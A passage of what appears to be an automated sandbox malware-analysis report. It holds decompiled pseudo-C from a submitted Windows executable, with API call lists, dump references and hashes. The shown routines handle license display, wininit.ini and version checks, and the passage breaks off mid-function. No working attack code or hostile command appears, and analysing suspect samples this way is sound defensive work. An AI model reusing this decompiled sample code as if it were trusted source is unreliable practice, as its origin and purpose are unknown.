                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053A3F(void* __eflags) {
                                                                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = "LICENSE";
                                                                                                                                                                                                                                                				_t1 = E0005468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				 *0x58d4c = _t3;
                                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                                					_t19 = _t16;
                                                                                                                                                                                                                                                					if(E0005468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA( *0x58d4c, "<None>") == 0) {
                                                                                                                                                                                                                                                							LocalFree( *0x58d4c);
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x59124 = 0;
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t9 = E00056517(_t19, 0x7d1, 0, E00053100, 0, 0);
                                                                                                                                                                                                                                                						LocalFree( *0x58d4c);
                                                                                                                                                                                                                                                						if(_t9 != 0) {
                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x59124 = 0x800704c7;
                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E000544B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree( *0x58d4c);
                                                                                                                                                                                                                                                					 *0x59124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x59124 = E00056285();
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00052F64,?,00000002,00000000), ref: 00053A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00053AB3
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00053AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00053B13
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00053100,00000000,00000000), ref: 00053AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: cbe9a1a505c069c3f0bc27ec4a0065d6e5fb88cb9f64e5c2b81841c138df9c14
                                                                                                                                                                                                                                                • Instruction ID: 29a1d8cf535f837e0df72aa39d7c7d00efb7e200aa22d59d379655281abe2b5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbe9a1a505c069c3f0bc27ec4a0065d6e5fb88cb9f64e5c2b81841c138df9c14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011DA34300301ABFB645F329C09F5B7AF9DBD5743B10412EBE41E61F1DA7D88048665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000524E0(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t7;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				long _t26;
                                                                                                                                                                                                                                                				signed int _t27;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = __ebx;
                                                                                                                                                                                                                                                				_t7 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                                				_t25 = 0x104;
                                                                                                                                                                                                                                                				_t26 = 0;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					E0005658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                                					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                                					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                                						_lclose(_t25);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00052506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0005252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32 ref: 0005253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0005254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 00052555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 36571d33ca4a1c24d445cf096edc289c507873b5c2cb2acd5fcbd6529c7b9c85
                                                                                                                                                                                                                                                • Instruction ID: ffb20519dffa1a1950bf74893d28aa32431b7830c499ef5e3be367efae9f8dab
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36571d33ca4a1c24d445cf096edc289c507873b5c2cb2acd5fcbd6529c7b9c85
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 880152327002186BD7609B659C0DEDF7BBCDB46762F400255FA49D3190DE788E458AA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E000536EE(CHAR* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                                				signed int _v420;
                                                                                                                                                                                                                                                				signed int _v424;
                                                                                                                                                                                                                                                				CHAR* _v428;
                                                                                                                                                                                                                                                				CHAR* _v432;
                                                                                                                                                                                                                                                				signed int _v436;
                                                                                                                                                                                                                                                				CHAR* _v440;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                                				CHAR* _t77;
                                                                                                                                                                                                                                                				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x58004; // 0x5a679bd9
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x58184 = 1;
						 *0x58180 = 1;
						L13:
						 *0x59a40 = _t119;
						L14:
						__eflags =  *0x58a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00052A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00052A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x58a38 & 0x00000001;
											if(( *0x58a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0005681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													__eflags = _t97 - 6;
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t98 = E000567C9(_t124, _t124);
                                                                                                                                                                                                                                                												__eflags = _t98;
                                                                                                                                                                                                                                                												if(_t98 == 0) {
                                                                                                                                                                                                                                                													goto L57;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L58;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                                										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                                											goto L30;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										__eflags = _t138;
                                                                                                                                                                                                                                                										if(_t138 == 0) {
                                                                                                                                                                                                                                                											goto L66;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t135 = 0;
                                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                                										goto L44;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L37:
                                                                                                                                                                                                                                                									_t129 = _v432;
                                                                                                                                                                                                                                                									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                                									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t133 =  &_v268;
                                                                                                                                                                                                                                                									_t104 = E000528E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                                									__eflags = _t104;
                                                                                                                                                                                                                                                									if(_t104 != 0) {
                                                                                                                                                                                                                                                										goto L66;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t135 = _v428;
                                                                                                                                                                                                                                                									_t133 = 0x54d;
                                                                                                                                                                                                                                                									_t138 = 0x54d;
                                                                                                                                                                                                                                                									goto L40;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L33;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							if(_t91 > 0) {
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t123;
                                                                                                                                                                                                                                                							if(_t123 != 0) {
                                                                                                                                                                                                                                                								__eflags = _t91;
                                                                                                                                                                                                                                                								if(_t91 != 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                                								L27:
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								L28:
                                                                                                                                                                                                                                                								__eflags = _t135;
                                                                                                                                                                                                                                                								if(_t135 == 0) {
                                                                                                                                                                                                                                                									goto L33;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t138 = 0x54c;
                                                                                                                                                                                                                                                								goto L30;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t91;
                                                                                                                                                                                                                                                							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                                							if(_t91 != 0) {
                                                                                                                                                                                                                                                								_t131 = _v424;
                                                                                                                                                                                                                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                                									goto L37;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                                							_t109 = _v424;
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                                                							L33:
                                                                                                                                                                                                                                                							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                                							_v428 = _t135;
                                                                                                                                                                                                                                                							_v420 = _t135;
                                                                                                                                                                                                                                                							__eflags = _t135 - 2;
                                                                                                                                                                                                                                                						} while (_t135 < 2);
                                                                                                                                                                                                                                                						goto L36;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__eflags = _t77 == 1;
                                                                                                                                                                                                                                                					if(_t77 == 1) {
                                                                                                                                                                                                                                                						 *0x59a40 = _t119;
                                                                                                                                                                                                                                                						 *0x58184 = 1;
                                                                                                                                                                                                                                                						 *0x58180 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - 3;
                                                                                                                                                                                                                                                						if(_t133 > 3) {
                                                                                                                                                                                                                                                							__eflags = _t133 - 5;
                                                                                                                                                                                                                                                							if(_t133 < 5) {
                                                                                                                                                                                                                                                								goto L14;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t113 = 3;
                                                                                                                                                                                                                                                							_t119 = _t113;
                                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t119 = 1;
                                                                                                                                                                                                                                                						_t114 = 3;
                                                                                                                                                                                                                                                						 *0x59a40 = 1;
                                                                                                                                                                                                                                                						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x58184 = _t135;
                                                                                                                                                                                                                                                							 *0x58180 = _t135;
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t138 = 0x4ca;
                                                                                                                                                                                                                                                					goto L44;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t138 = 0x4b4;
                                                                                                                                                                                                                                                					L44:
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					_push(_t135);
                                                                                                                                                                                                                                                					L65:
                                                                                                                                                                                                                                                					_t133 = _t138;
                                                                                                                                                                                                                                                					E000544B9(0, _t138);
                                                                                                                                                                                                                                                					L66:
                                                                                                                                                                                                                                                					return E00056CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x00053a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053a06
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x00053a0b
                                                                                                                                                                                                                                                0x00053a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053a09
                                                                                                                                                                                                                                                0x000539fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539fc
                                                                                                                                                                                                                                                0x000539d3
                                                                                                                                                                                                                                                0x000539d8
                                                                                                                                                                                                                                                0x000539da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000539dc
                                                                                                                                                                                                                                                0x000539b6
                                                                                                                                                                                                                                                0x00053955
                                                                                                                                                                                                                                                0x0005395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053961
                                                                                                                                                                                                                                                0x00053963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053969
                                                                                                                                                                                                                                                0x00053915
                                                                                                                                                                                                                                                0x00053915
                                                                                                                                                                                                                                                0x0005391b
                                                                                                                                                                                                                                                0x0005391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005392d
                                                                                                                                                                                                                                                0x00053933
                                                                                                                                                                                                                                                0x00053938
                                                                                                                                                                                                                                                0x0005393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053940
                                                                                                                                                                                                                                                0x00053946
                                                                                                                                                                                                                                                0x0005394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538f2
                                                                                                                                                                                                                                                0x00053843
                                                                                                                                                                                                                                                0x00053845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005384b
                                                                                                                                                                                                                                                0x0005384d
                                                                                                                                                                                                                                                0x00053883
                                                                                                                                                                                                                                                0x00053885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005389a
                                                                                                                                                                                                                                                0x0005389e
                                                                                                                                                                                                                                                0x0005389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a0
                                                                                                                                                                                                                                                0x000538a0
                                                                                                                                                                                                                                                0x000538a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538a4
                                                                                                                                                                                                                                                0x0005384f
                                                                                                                                                                                                                                                0x00053851
                                                                                                                                                                                                                                                0x00053857
                                                                                                                                                                                                                                                0x0005386e
                                                                                                                                                                                                                                                0x00053877
                                                                                                                                                                                                                                                0x0005387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053881
                                                                                                                                                                                                                                                0x00053859
                                                                                                                                                                                                                                                0x0005385c
                                                                                                                                                                                                                                                0x00053862
                                                                                                                                                                                                                                                0x00053866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000538f4
                                                                                                                                                                                                                                                0x000538f4
                                                                                                                                                                                                                                                0x000538f5
                                                                                                                                                                                                                                                0x000538fb
                                                                                                                                                                                                                                                0x00053901
                                                                                                                                                                                                                                                0x00053901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005390a
                                                                                                                                                                                                                                                0x0005374b
                                                                                                                                                                                                                                                0x0005374e
                                                                                                                                                                                                                                                0x0005375c
                                                                                                                                                                                                                                                0x00053764
                                                                                                                                                                                                                                                0x00053769
                                                                                                                                                                                                                                                0x0005376e
                                                                                                                                                                                                                                                0x00053771
                                                                                                                                                                                                                                                0x0005379c
                                                                                                                                                                                                                                                0x0005379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00053723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 000539C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 000539F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 192b2813f0627afc96908907778f2c00a49294519021c4c7cf6b1f0e0a50bcc1
                                                                                                                                                                                                                                                • Instruction ID: 96cd7b196c2445cac5669efb8213231d67e9415094e2660e523c5f8c6cb715ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192b2813f0627afc96908907778f2c00a49294519021c4c7cf6b1f0e0a50bcc1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0491E4B1E012249BEBB58A14CC817FBB7E4AB45386F1541A9DC49EB241DB748F88CF51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00056495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				signed int _t9;
